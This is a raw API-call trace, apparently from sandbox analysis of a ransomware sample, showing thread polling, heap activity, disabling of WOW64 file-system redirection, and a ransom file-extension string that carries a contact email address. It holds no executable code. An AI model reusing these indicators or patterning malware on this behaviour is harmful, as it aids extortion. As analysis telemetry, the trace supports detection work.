WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0171.114] GetTickCount () returned 0x165c9 [0171.114] GetTickCount () returned 0x165c9 [0171.114] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0171.258] GetTickCount () returned 0x16656 [0171.258] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0171.448] GetTickCount () returned 0x16721 [0171.449] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0171.718] GetTickCount () returned 0x1682b [0171.729] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0172.171] GetTickCount () returned 0x169f0 [0172.171] GetTickCount () returned 0x169f0 [0172.171] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0172.393] GetTickCount () returned 0x16acb [0172.393] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0172.617] GetTickCount () returned 0x16ba5 [0172.617] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0172.812] GetTickCount () returned 0x16c70 [0172.812] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0173.084] GetTickCount () returned 0x16d7a [0173.084] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0173.284] GetTickCount () returned 0x16e45 [0173.284] GetTickCount () returned 0x16e45 [0173.284] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0173.458] GetTickCount () returned 0x16ef1 [0173.458] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0173.911] GetTickCount () returned 0x170b6 [0173.911] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0174.279] GetTickCount () returned 0x1722d [0174.279] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0174.776] GetTickCount () returned 0x17421 [0174.776] GetTickCount () returned 0x17421 [0174.776] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0175.138] GetTickCount () returned 0x17579 [0175.138] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0175.498] GetTickCount () returned 0x176e0 [0175.498] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0175.654] GetTickCount () returned 0x1777d [0175.654] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0175.776] GetTickCount () returned 0x177fa [0175.776] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0175.952] GetTickCount () returned 0x178b5 [0175.952] GetTickCount () returned 0x178b5 [0175.952] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0176.071] GetTickCount () returned 0x17922 [0176.071] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0176.285] GetTickCount () returned 0x179fd [0176.285] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0176.449] GetTickCount () returned 0x17a99 [0176.449] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0176.717] GetTickCount () returned 0x17ba3 [0176.717] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0176.964] GetTickCount () returned 0x17c9d [0176.964] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0177.183] GetTickCount () returned 0x17d78 [0177.184] GetTickCount () returned 0x17d78 [0177.184] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0177.322] GetTickCount () returned 0x17e04 [0177.322] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0177.484] GetTickCount () returned 0x17ea1 [0177.484] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0177.627] GetTickCount () returned 0x17f3d [0177.627] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x102 [0177.784] GetTickCount () returned 0x17fd9 [0177.784] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0x64) returned 0x0 [0177.872] WaitForMultipleObjects (nCount=0x4, lpHandles=0x282ff5c*=0x320, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0178.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x55aa020 | out: hHeap=0x6a0000) returned 1 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6de0f8 | out: hHeap=0x6a0000) returned 1 [0178.790] lstrlenW (lpString=".bat") returned 4 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709278 | out: hHeap=0x6a0000) returned 1 [0178.790] lstrlenW (lpString=".[idecryptyourdata@cock.li]") returned 27 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b7508 | out: hHeap=0x6a0000) returned 1 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6de1a8 | out: hHeap=0x6a0000) returned 1 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709188 | out: hHeap=0x6a0000) returned 1 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x709098 | out: hHeap=0x6a0000) returned 1 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7091b8 | out: hHeap=0x6a0000) returned 1 [0178.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7091d0 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x708f60 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7091a0 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6de288 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7090b0 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x708f00 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7090c8 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6de1c8 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6de0c8 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x708f90 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6de218 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x708ff0 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6de0e8 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x708f30 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddc00 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddd18 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba4f0 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc290 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e6f70 | out: hHeap=0x6a0000) returned 1 [0178.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fbd70 | out: hHeap=0x6a0000) returned 1 [0178.791] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456cb38 [0178.792] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456cb38, Size=0x20) returned 0x458c178 [0178.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456ccd0 [0178.792] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456ccd0, Size=0x20) returned 0x458c448 [0178.792] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.792] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.792] Wow64DisableWow64FsRedirection (in: OldValue=0x282ff7c | out: OldValue=0x282ff7c*=0x1) returned 1 [0178.792] lstrlenW (lpString="kernel32.dll") returned 12 [0178.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c448 | out: hHeap=0x6a0000) returned 1 [0178.792] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c178 | out: hHeap=0x6a0000) returned 1 Thread: id = 38 os_tid = 0xe58 Thread: id = 39 os_tid = 0xe60 [0155.023] GetTickCount () returned 0x126ec [0155.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6fbad0 [0155.023] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6fbad0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2e4 [0155.024] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6fbad0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2e8 [0155.024] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6fbad0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2ec [0155.025] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x408d90, lpParameter=0x6fbad0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f0 [0155.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703278 [0155.025] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x703278, Size=0x20) returned 0x6ddea8 [0155.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x7031b8 [0155.025] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x7031b8, Size=0x20) returned 0x6ddfe8 [0155.026] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0155.026] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0155.026] Wow64DisableWow64FsRedirection (in: OldValue=0x2eaff7c | out: OldValue=0x2eaff7c*=0x0) returned 1 [0155.026] lstrlenW (lpString="kernel32.dll") returned 12 [0155.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddea8 | out: hHeap=0x6a0000) returned 1 [0155.026] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0155.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddfe8 | out: hHeap=0x6a0000) returned 1 [0155.026] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091a0, lpParameter=0x7093c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2f4 [0155.026] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0155.222] GetTickCount () returned 0x127b7 [0155.222] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0155.599] GetTickCount () returned 0x1292e [0155.599] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0156.202] GetTickCount () returned 0x12b7f [0156.202] GetTickCount () returned 0x12b7f [0156.202] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0156.867] GetTickCount () returned 0x12e1f [0156.867] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0157.264] GetTickCount () returned 0x12fa6 [0157.264] GetTickCount () returned 0x12fa6 [0157.264] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0157.482] GetTickCount () returned 0x13081 [0157.482] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0157.944] GetTickCount () returned 0x13255 [0157.944] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0158.361] GetTickCount () returned 0x133ec [0158.361] GetTickCount () returned 0x133ec [0158.361] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0158.615] GetTickCount () returned 0x134e6 [0158.615] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0158.943] GetTickCount () returned 0x1362e [0158.943] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0159.316] GetTickCount () returned 0x137a5 [0159.316] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0159.634] GetTickCount () returned 0x138ed [0159.634] GetTickCount () returned 0x138ed [0159.634] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0160.191] GetTickCount () returned 0x13b10 [0160.191] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0160.516] GetTickCount () returned 0x13c58 [0160.516] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0160.820] GetTickCount () returned 0x13d90 [0160.820] GetTickCount () returned 0x13d90 [0160.820] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0161.085] GetTickCount () returned 0x13e8a [0161.085] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0161.337] GetTickCount () returned 0x13f94 [0161.337] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0161.499] GetTickCount () returned 0x14030 [0161.499] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0161.754] GetTickCount () returned 0x1412a [0161.754] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0161.992] GetTickCount () returned 0x14224 [0161.992] GetTickCount () returned 0x14224 [0161.992] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0162.264] GetTickCount () returned 0x1432e [0162.264] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0162.465] GetTickCount () returned 0x143f9 [0162.466] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0162.785] GetTickCount () returned 0x14532 [0162.785] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0163.040] GetTickCount () returned 0x1463b [0163.040] GetTickCount () returned 0x1463b [0163.040] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0163.460] GetTickCount () returned 0x147e1 [0163.460] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0163.798] GetTickCount () returned 0x14929 [0163.799] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0164.192] GetTickCount () returned 0x14ab0 [0164.192] GetTickCount () returned 0x14ab0 [0164.192] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0164.661] GetTickCount () returned 0x14c85 [0164.661] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0164.899] GetTickCount () returned 0x14d8e [0164.899] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0165.071] GetTickCount () returned 0x14e3a [0165.071] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0165.340] GetTickCount () returned 0x14f44 [0165.340] GetTickCount () returned 0x14f44 [0165.340] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0165.718] GetTickCount () returned 0x150bb [0165.718] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0166.019] GetTickCount () returned 0x151e4 [0166.019] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0166.259] GetTickCount () returned 0x152ce [0166.259] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0166.758] GetTickCount () returned 0x154c2 [0166.758] GetTickCount () returned 0x154c2 [0166.758] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0167.055] GetTickCount () returned 0x155eb [0167.055] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0167.234] GetTickCount () returned 0x156a6 [0167.234] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0167.587] GetTickCount () returned 0x157fe [0167.587] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0167.783] GetTickCount () returned 0x158c9 [0167.783] GetTickCount () returned 0x158c9 [0167.783] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0167.966] GetTickCount () returned 0x15975 [0167.966] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0168.269] GetTickCount () returned 0x15aae [0168.269] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0168.851] GetTickCount () returned 0x15cf0 [0168.851] GetTickCount () returned 0x15cf0 [0168.852] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0169.603] GetTickCount () returned 0x15fde [0169.603] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0170.024] GetTickCount () returned 0x16193 [0170.024] GetTickCount () returned 0x16193 [0170.024] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0170.291] GetTickCount () returned 0x1629d [0170.291] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0170.597] GetTickCount () returned 0x163c6 [0170.597] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0170.865] GetTickCount () returned 0x164cf [0170.865] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0171.114] GetTickCount () returned 0x165c9 [0171.114] GetTickCount () returned 0x165c9 [0171.114] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0171.258] GetTickCount () returned 0x16656 [0171.258] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0171.449] GetTickCount () returned 0x16721 [0171.449] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0171.729] GetTickCount () returned 0x1682b [0171.729] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0172.171] GetTickCount () returned 0x169f0 [0172.171] GetTickCount () returned 0x169f0 [0172.171] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0172.393] GetTickCount () returned 0x16acb [0172.393] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0172.617] GetTickCount () returned 0x16ba5 [0172.617] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0172.812] GetTickCount () returned 0x16c70 [0172.812] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0173.083] GetTickCount () returned 0x16d7a [0173.083] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0173.283] GetTickCount () returned 0x16e45 [0173.283] GetTickCount () returned 0x16e45 [0173.283] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0173.458] GetTickCount () returned 0x16ef1 [0173.458] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0173.912] GetTickCount () returned 0x170b6 [0173.912] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0174.279] GetTickCount () returned 0x1722d [0174.279] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0174.776] GetTickCount () returned 0x17421 [0174.776] GetTickCount () returned 0x17421 [0174.776] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0175.138] GetTickCount () returned 0x17579 [0175.138] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0175.498] GetTickCount () returned 0x176e0 [0175.499] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0175.654] GetTickCount () returned 0x1777d [0175.654] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0175.776] GetTickCount () returned 0x177fa [0175.776] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0175.952] GetTickCount () returned 0x178b5 [0175.952] GetTickCount () returned 0x178b5 [0175.952] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0176.071] GetTickCount () returned 0x17922 [0176.071] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0176.285] GetTickCount () returned 0x179fd [0176.285] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0176.448] GetTickCount () returned 0x17a99 [0176.448] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0176.717] GetTickCount () returned 0x17ba3 [0176.717] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0176.964] GetTickCount () returned 0x17c9d [0176.964] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0177.183] GetTickCount () returned 0x17d78 [0177.183] GetTickCount () returned 0x17d78 [0177.183] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0177.322] GetTickCount () returned 0x17e04 [0177.322] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0177.484] GetTickCount () returned 0x17ea1 [0177.484] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0177.627] GetTickCount () returned 0x17f3d [0177.627] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0177.784] GetTickCount () returned 0x17fd9 [0177.784] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0177.973] GetTickCount () returned 0x18095 [0177.973] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x102 [0178.254] GetTickCount () returned 0x181ae [0178.254] GetTickCount () returned 0x181ae [0178.254] WaitForSingleObject (hHandle=0x2f4, dwMilliseconds=0x64) returned 0x0 [0178.254] WaitForMultipleObjects (nCount=0x4, lpHandles=0x2eaff5c*=0x2e4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0179.269] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5630020 | out: hHeap=0x6a0000) returned 1 [0179.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b638 | out: hHeap=0x6a0000) returned 1 [0179.274] lstrlenW (lpString=".bat") returned 4 [0179.274] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702e28 | out: hHeap=0x6a0000) returned 1 [0179.275] lstrlenW (lpString=".[idecryptyourdata@cock.li]") returned 27 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x701d38 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b6c8 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fa2c8 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fa0e8 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fa0d0 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fa1f0 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fa070 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fa0a0 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b618 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fa2b0 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fa100 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703068 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b728 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b698 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x703080 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b778 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702f18 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x73b6d8 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x702e58 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddb38 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ddc78 | out: hHeap=0x6a0000) returned 1 [0179.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba7b0 | out: hHeap=0x6a0000) returned 1 [0179.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc6c8 | out: hHeap=0x6a0000) returned 1 [0179.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x7093c0 | out: hHeap=0x6a0000) returned 1 [0179.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fbad0 | out: hHeap=0x6a0000) returned 1 [0179.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456ccd0 [0179.284] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456ccd0, Size=0x20) returned 0x458c448 [0179.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x456ca90 [0179.284] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x456ca90, Size=0x20) returned 0x458c498 [0179.285] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0179.285] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0179.285] Wow64DisableWow64FsRedirection (in: OldValue=0x2eaff7c | out: OldValue=0x2eaff7c*=0x1) returned 1 [0179.285] lstrlenW (lpString="kernel32.dll") returned 12 [0179.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c498 | out: hHeap=0x6a0000) returned 1 [0179.285] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0179.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x458c448 | out: hHeap=0x6a0000) returned 1 Thread: id = 42 os_tid = 0xe74 [0155.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x74b7f8 [0155.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10000) returned 0x75b800 [0155.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x7032d8 [0155.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x6) returned 0x73b668 [0155.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703260 [0155.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100000) returned 0x3b49020 [0155.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x703278 [0155.138] RtlReAllocateHeap 